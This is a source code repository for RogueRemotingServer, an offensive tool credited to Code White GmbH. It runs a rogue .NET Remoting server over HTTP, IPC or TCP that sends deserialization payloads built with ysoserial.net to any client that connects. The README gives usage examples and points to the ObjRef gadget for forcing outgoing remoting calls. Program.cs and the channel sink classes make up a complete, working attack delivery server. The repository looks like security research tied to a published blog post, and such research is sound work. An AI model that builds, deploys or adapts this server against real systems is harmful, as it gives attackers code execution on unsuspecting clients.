├── .gitattributes
├── .gitignore
├── DISCLAIMER.md
├── LICENSE
├── README.md
├── RogueRemotingServer.sln
└── RogueRemotingServer
├── Program.cs
├── Properties
└── AssemblyInfo.cs
├── ReturnMessage.xml
├── RogueRemotingServer.csproj
├── RogueServerChannelSink.cs
├── RogueServerChannelSinkProvider.cs
└── packages.config
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1 | ### DISCLAIMER
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3 | You expressly understand and agree that RogueRemotingServer (creators and contributors) shall not be liable for any damages or losses resulting from your use of this tool or third-party products that use it.
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/README.md:
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1 | # RogueRemotingServer
2 |
3 | A rogue .NET Remoting server to deliver BinaryFormatter/SoapFormatter payloads to connecting clients.
4 |
5 |
6 | ## Usage
7 |
8 | ```
9 | Usage: RogueRemotingServer.exe [OPTIONS] URL PATH
10 |
11 | A rogue .NET Remoting server to deliver BinaryFormatter/SoapFormatter payloads to connecting clients.
12 |
13 | Positional arguments:
14 | URL remoting URL
15 | PATH path to payload file
16 |
17 | Options:
18 | -f, --format=VALUE message format (Default, Binary, Soap)
19 | -p, --property=VALUE1=VALUE2
20 | channel properties (see http://msdn.microsof-
21 | t.com/kw7c6kwc)
22 | --wrapSoapPayload wrap SOAP payload in MethodResponse message
23 | -v, --verbose
24 | -h, -?, --help
25 |
26 | Examples:
27 | RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0:12345/Foo path\to\raw\payload.soap
28 | RogueRemotingServer.exe ipc://NamedPipeName/Bar path\to\raw\payload.bin
29 | RogueRemotingServer.exe -p=secure=true tcp://0.0.0.0:12345/Baz path\to\raw\payload.bin
30 |
31 | .NET Remoting clients generally expect Soap for HTTP and Binary for IPC and TCP.
32 | ```
33 |
34 | Intended to deliver raw `BinaryFormatter`/`SoapFormatter` generated by [YSoSerial.Net](https://github.com/pwntester/ysoserial.net). Use `--wrapSoapPayload` for `SoapFormatter` payloads.
35 |
36 | You can use the [*ObjRef* gadget](https://github.com/pwntester/ysoserial.net/pull/115) to cause an outgoing .NET Remoting method call to a specified URL on arbitrary `BinaryFormatter`/`SoapFormatter` deserialization.
37 |
38 |
39 | ## References
40 |
41 | * [Code White blog post *.NET Remoting Revisited*](https://codewhitesec.blogspot.com/2022/01/dotnet-remoting-revisited.html)
42 |
43 |
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1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
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5 | MinimumVisualStudioVersion = 10.0.40219.1
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/RogueRemotingServer/Program.cs:
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1 | using NDesk.Options;
2 | using System;
3 | using System.Collections;
4 | using System.Collections.Generic;
5 | using System.IO;
6 | using System.Net;
7 | using System.Net.NetworkInformation;
8 | using System.Reflection;
9 | using System.Runtime.Remoting;
10 | using System.Runtime.Remoting.Channels;
11 | using System.Runtime.Remoting.Channels.Http;
12 | using System.Runtime.Remoting.Channels.Ipc;
13 | using System.Runtime.Remoting.Channels.Tcp;
14 | using System.Security.Principal;
15 | using System.Text;
16 | using System.Xml;
17 |
18 | namespace RogueRemotingServer
19 | {
20 | class Program
21 | {
22 | private static readonly string EXE = Path.GetFileName(Assembly.GetExecutingAssembly().Location);
23 |
24 | static void Main(string[] args)
25 | {
26 | bool showHelp = false;
27 | bool verbose = false;
28 | Format format = Format.Default;
29 | IDictionary properties = new Hashtable();
30 | bool wrapSoapPayload = false;
31 |
32 | OptionSet optionSet = new OptionSet
33 | {
34 | { "f|format=",
35 | "message format (" + Program.GetEnumValuesAsString(typeof(Format)) + ")",
36 | v => format = (Format)Enum.Parse(typeof(Format), v, true)
37 | },
38 | { "p|property={=}",
39 | "channel properties (see http://msdn.microsoft.com/kw7c6kwc)",
40 | (n, v) => properties.Add(n, v)
41 | },
42 | { "wrapSoapPayload",
43 | "wrap SOAP payload in MethodResponse message",
44 | v => wrapSoapPayload = (v != null)
45 | },
46 | { "v|verbose",
47 | v => verbose = (v != null)
48 | },
49 | { "h|?|help",
50 | v => showHelp = (v != null)
51 | }
52 | };
53 | List posArgs = optionSet.Parse(args);
54 |
55 | if (showHelp)
56 | {
57 | WriteHelp(Console.Out, optionSet);
58 | Environment.Exit(0);
59 | }
60 |
61 | try
62 | {
63 | if (posArgs.Count < 1)
64 | {
65 | throw new ArgumentException("service URI is missing");
66 | }
67 | if (posArgs.Count < 2)
68 | {
69 | throw new ArgumentException("payload file is missing");
70 | }
71 |
72 | Uri uri = new Uri(posArgs[0]);
73 | UriBuilder uriBuilder = new UriBuilder(uri.Scheme, uri.Host, uri.Port, uri.LocalPath);
74 |
75 | if (string.IsNullOrEmpty(uriBuilder.Path) || uriBuilder.Path == "/")
76 | {
77 | uriBuilder.Path = "/" + Guid.NewGuid().ToString();
78 | }
79 | string objectUri = uriBuilder.Path.TrimStart(new char[]
80 | {
81 | '/'
82 | });
83 |
84 | Protocol protocol = Protocol.Unknown;
85 | try
86 | {
87 | protocol = (Protocol)Enum.Parse(typeof(Protocol), uri.Scheme, true);
88 | if (format == Format.Default)
89 | {
90 | format = ((protocol == Protocol.Http) ? Format.Soap : Format.Binary);
91 | }
92 | }
93 | catch
94 | {
95 | throw new ArgumentException("Transport " + uri.Scheme + " is not supported");
96 | }
97 |
98 | if (protocol != Protocol.Ipc)
99 | {
100 | if (!properties.Contains("port"))
101 | {
102 | properties["port"] = uri.Port;
103 | }
104 | if (uri.IsLoopback)
105 | {
106 | properties["rejectRemoteRequests"] = "true";
107 | }
108 | if (!properties.Contains("bindTo"))
109 | {
110 | properties["bindTo"] = uri.Host;
111 | }
112 | }
113 |
114 | byte[] payload = File.ReadAllBytes(posArgs[1]);
115 | if (format == Format.Soap && wrapSoapPayload)
116 | {
117 | payload = Program.WrapSoapPayloadInReturnMessage(payload);
118 | }
119 |
120 | bool allowAnyUri = objectUri == "*";
121 | RogueServerChannelSinkProvider sinkProvider = new RogueServerChannelSinkProvider(protocol, allowAnyUri, format, payload);
122 |
123 | IChannel channel;
124 | switch (protocol)
125 | {
126 | case Protocol.Http:
127 | channel = new HttpServerChannel(properties, sinkProvider);
128 | break;
129 | case Protocol.Ipc:
130 | if (!properties.Contains("authorizedGroup"))
131 | {
132 | properties["authorizedGroup"] = new SecurityIdentifier(WellKnownSidType.WorldSid, null).Translate(typeof(NTAccount)).ToString();
133 | }
134 | properties["portName"] = uri.Authority;
135 | channel = new IpcServerChannel(properties, sinkProvider);
136 | break;
137 | case Protocol.Tcp:
138 | channel = new TcpServerChannel(properties, sinkProvider);
139 | break;
140 | default:
141 | throw new ArgumentException("Transport " + uri.Scheme + " is not supported");
142 | }
143 |
144 | bool ensureSecurity = properties.Contains("secure") && bool.Parse((string)properties["secure"]);
145 | ChannelServices.RegisterChannel(channel, ensureSecurity);
146 |
147 | if (!allowAnyUri)
148 | {
149 | RemotingConfiguration.RegisterWellKnownServiceType(typeof(object), objectUri, WellKnownObjectMode.Singleton);
150 | }
151 | Console.WriteLine(channel.GetType().Name + " for '" + objectUri + "' created:");
152 |
153 | IPAddress address = null;
154 | if (IPAddress.TryParse(uriBuilder.Host, out address) && address.Equals(IPAddress.Any))
155 | {
156 | foreach (NetworkInterface netInterface in NetworkInterface.GetAllNetworkInterfaces())
157 | {
158 | IPInterfaceProperties ipProps = netInterface.GetIPProperties();
159 | foreach (UnicastIPAddressInformation addr in ipProps.UnicastAddresses)
160 | {
161 | uriBuilder.Host = addr.Address.ToString();
162 | Console.WriteLine($" {uriBuilder}");
163 | }
164 | }
165 | }
166 | else
167 | {
168 | Console.WriteLine($" {uriBuilder}");
169 | }
170 |
171 | if (verbose)
172 | {
173 | Console.WriteLine("Channel properties:");
174 | foreach (DictionaryEntry e in properties)
175 | {
176 | Console.WriteLine($" {e.Key}={e.Value}");
177 | }
178 | }
179 |
180 | Console.WriteLine();
181 | Console.WriteLine("Press any key to exit ...");
182 | Console.ReadKey();
183 | }
184 | catch (Exception e)
185 | {
186 | Console.Error.WriteLine(e);
187 | Environment.Exit(-1);
188 | }
189 | }
190 |
191 | private static void WriteHelp(TextWriter writer, OptionSet optionSet)
192 | {
193 | writer.WriteLine($"Usage: {EXE} [OPTIONS] URL PATH");
194 | writer.WriteLine();
195 | writer.WriteLine("A rogue .NET Remoting server to deliver BinaryFormatter/SoapFormatter payloads to connecting clients.");
196 | writer.WriteLine();
197 |
198 | writer.WriteLine("Positional arguments:");
199 | writer.WriteLine(" URL remoting URL");
200 | writer.WriteLine(" PATH path to payload file");
201 | writer.WriteLine();
202 |
203 | writer.WriteLine("Options:");
204 | optionSet.WriteOptionDescriptions(writer);
205 | writer.WriteLine();
206 |
207 | writer.WriteLine("Examples:");
208 | writer.WriteLine($" {EXE} --wrapSoapPayload http://0.0.0.0:12345/Foo path\\to\\raw\\payload.soap");
209 | writer.WriteLine($" {EXE} ipc://NamedPipeName/Bar path\\to\\raw\\payload.bin");
210 | writer.WriteLine($" {EXE} -p=secure=true tcp://0.0.0.0:12345/Baz path\\to\\raw\\payload.bin");
211 | writer.WriteLine();
212 |
213 | writer.WriteLine(".NET Remoting clients generally expect Soap for HTTP and Binary for IPC and TCP.");
214 | }
215 |
216 | private static byte[] WrapSoapPayloadInReturnMessage(byte[] payload)
217 | {
218 | string xpathBody = "/*[local-name()=\"Envelope\"]/*[local-name()=\"Body\"]";
219 | string xpathValue = "//*[local-name()=\"ListDictionaryInternal_x002B_DictionaryNode\"]/*[local-name()=\"value\"]";
220 |
221 | XmlDocument tmplDoc = new XmlDocument();
222 | tmplDoc.Load(GetAssemblyResourceAsStream("ReturnMessage.xml"));
223 | XmlElement tmplRoot = tmplDoc.DocumentElement;
224 | XmlElement tmplBody = (XmlElement)tmplRoot.SelectSingleNode(xpathBody);
225 | if (tmplBody == null)
226 | {
227 | throw new ArgumentException($"No element for XPath '{xpathBody}' found in payload!");
228 | }
229 |
230 | XmlDocument payloadDoc = new XmlDocument();
231 | payloadDoc.Load(new MemoryStream(payload));
232 | XmlNode payloadBody = payloadDoc.DocumentElement.SelectSingleNode(xpathBody);
233 | string firstId = null;
234 | foreach (var node in payloadBody.ChildNodes)
235 | {
236 | if (node is XmlElement)
237 | {
238 | XmlElement elem = (XmlElement)node;
239 | if (firstId == null && elem.HasAttribute("id"))
240 | {
241 | firstId = elem.GetAttribute("id");
242 | }
243 | tmplBody.AppendChild(tmplDoc.ImportNode(elem, true));
244 | }
245 | }
246 |
247 | XmlElement valueElem = (XmlElement)tmplRoot.SelectSingleNode(xpathValue);
248 | if (valueElem == null)
249 | {
250 | throw new Exception($"No element for XPath '{xpathValue}' found in 'ReturnMessage.xml' template!");
251 | }
252 | valueElem.SetAttribute("href", "#" + firstId);
253 |
254 | return Encoding.Default.GetBytes(tmplDoc.OuterXml);
255 | }
256 |
257 | private static Stream GetAssemblyResourceAsStream(string name)
258 | {
259 | return Assembly.GetExecutingAssembly().GetManifestResourceStream(nameof(RogueRemotingServer) + "." + name);
260 | }
261 |
262 | private static string GetEnumValuesAsString(Type enumType)
263 | {
264 | return string.Join(", ", Enum.GetNames(enumType));
265 | }
266 | }
267 |
268 | internal enum Format
269 | {
270 | Default,
271 | Binary,
272 | Soap
273 | }
274 |
275 | internal enum Protocol
276 | {
277 | Unknown,
278 | Http,
279 | Ipc,
280 | Tcp
281 | }
282 | }
283 |
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1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("RogueRemotingServer")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("Code White GmbH")]
12 | [assembly: AssemblyProduct("RogueRemotingServer")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("29c21460-1da1-46b8-aed6-5379a909bf07")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
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2 |
3 |
4 | SOAP-ENV:Server
5 | **** System.Exception - Exception of type 'System.Exception' was thrown.
6 |
7 |
8 |
9 |
10 |
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12 |
13 |
14 | System.Exception
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22 |
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29 | 1
30 | 1
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33 | x
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37 |
38 | <_Major>2
39 | <_Minor>0
40 | <_Build>-1
41 | <_Revision>-1
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1 |
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5 | Debug
6 | AnyCPU
7 | {29C21460-1DA1-46B8-AED6-5379A909BF07}
8 | Exe
9 | RogueRemotingServer
10 | RogueRemotingServer
11 | v3.5
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 | ..\packages\NDesk.Options.0.2.1\lib\NDesk.Options.dll
37 |
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1 | using System;
2 | using System.Collections;
3 | using System.IO;
4 | using System.Net.Sockets;
5 | using System.Reflection;
6 | using System.Runtime.Remoting;
7 | using System.Runtime.Remoting.Channels;
8 | using System.Runtime.Remoting.Messaging;
9 |
10 | namespace RogueRemotingServer
11 | {
12 | internal class RogueServerChannelSink : IServerChannelSink, IChannelSinkBase
13 | {
14 | private readonly Protocol _protocol;
15 | private readonly bool _allowAnyUri;
16 | private readonly Format _format;
17 | private readonly byte[] _payload;
18 | private static FieldInfo _stackField;
19 | private static FieldInfo _stateField;
20 | private static FieldInfo _netSocketField;
21 |
22 | public RogueServerChannelSink(Protocol protocol, bool allowAnyUri, Format format, byte[] payload)
23 | {
24 | this._protocol = protocol;
25 | this._allowAnyUri = allowAnyUri;
26 | this._format = format;
27 | this._payload = payload;
28 | }
29 |
30 | public IServerChannelSink NextChannelSink => throw new NotImplementedException();
31 |
32 | public IDictionary Properties => throw new NotImplementedException();
33 |
34 | public void AsyncProcessResponse(IServerResponseChannelSinkStack sinkStack, object state, IMessage msg, ITransportHeaders headers, Stream stream)
35 | {
36 | throw new NotImplementedException();
37 | }
38 |
39 | public Stream GetResponseStream(IServerResponseChannelSinkStack sinkStack, object state, IMessage msg, ITransportHeaders headers)
40 | {
41 | throw new NotImplementedException();
42 | }
43 |
44 | public ServerProcessing ProcessMessage(IServerChannelSinkStack sinkStack, IMessage requestMsg, ITransportHeaders requestHeaders, Stream requestStream, out IMessage responseMsg, out ITransportHeaders responseHeaders, out Stream responseStream)
45 | {
46 | string requestUri = (string)requestHeaders["__RequestUri"];
47 | Console.Write("[*] Processing message for '" + requestUri + "' ");
48 | Socket socket = RogueServerChannelSink.GetClientSocket(sinkStack);
49 | if (socket != null)
50 | {
51 | Console.Write(string.Format("from {0} ", socket.RemoteEndPoint));
52 | }
53 | Console.Write("...");
54 | if (!this._allowAnyUri && RemotingServices.GetServerTypeForUri(requestUri) == null)
55 | {
56 | Console.WriteLine(" unknown service!");
57 | throw new RemotingException("Requested Service not found");
58 | }
59 | Console.WriteLine(" sending payload!");
60 |
61 | responseMsg = null;
62 | responseHeaders = new TransportHeaders();
63 | if (this._protocol == Protocol.Http)
64 | {
65 | responseHeaders["Content-Type"] = ((this._format == Format.Binary) ? "application/octet-stream" : "text/xml");
66 | }
67 | responseStream = new MemoryStream(this._payload);
68 | responseStream.Position = 0L;
69 |
70 | return ServerProcessing.Complete;
71 | }
72 |
73 | private static Socket GetClientSocket(IServerChannelSinkStack serverChannelSinkStack)
74 | {
75 | if (RogueServerChannelSink._stackField == null)
76 | {
77 | RogueServerChannelSink._stackField = serverChannelSinkStack.GetType().GetField("_stack", BindingFlags.Instance | BindingFlags.NonPublic);
78 | }
79 | var sinkStack = RogueServerChannelSink._stackField.GetValue(serverChannelSinkStack);
80 | if (RogueServerChannelSink._stateField == null)
81 | {
82 | RogueServerChannelSink._stateField = sinkStack.GetType().GetField("State", BindingFlags.Instance | BindingFlags.Public);
83 | }
84 | var serverHandler = RogueServerChannelSink._stateField.GetValue(sinkStack);
85 | if (RogueServerChannelSink._netSocketField == null)
86 | {
87 | RogueServerChannelSink._netSocketField = serverHandler.GetType().GetField("NetSocket", BindingFlags.Instance | BindingFlags.NonPublic);
88 | }
89 | return (Socket)RogueServerChannelSink._netSocketField.GetValue(serverHandler);
90 | }
91 | }
92 | }
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1 | using System.Runtime.Remoting.Channels;
2 |
3 | namespace RogueRemotingServer
4 | {
5 | internal class RogueServerChannelSinkProvider : IServerFormatterSinkProvider, IServerChannelSinkProvider
6 | {
7 | private readonly Protocol _protocol;
8 | private readonly bool _allowAnyUri;
9 | private readonly Format _format;
10 | private readonly byte[] _payload;
11 |
12 | public RogueServerChannelSinkProvider(Protocol protocol, bool allowAnyUri, Format format, byte[] payload)
13 | {
14 | this._protocol = protocol;
15 | this._allowAnyUri = allowAnyUri;
16 | this._format = format;
17 | this._payload = payload;
18 | }
19 |
20 | public IServerChannelSinkProvider Next { get; set; }
21 |
22 | public IServerChannelSink CreateSink(IChannelReceiver channel)
23 | {
24 | return new RogueServerChannelSink(this._protocol, this._allowAnyUri, this._format, this._payload);
25 | }
26 |
27 | public void GetChannelData(IChannelDataStore channelData) { }
28 | }
29 | }
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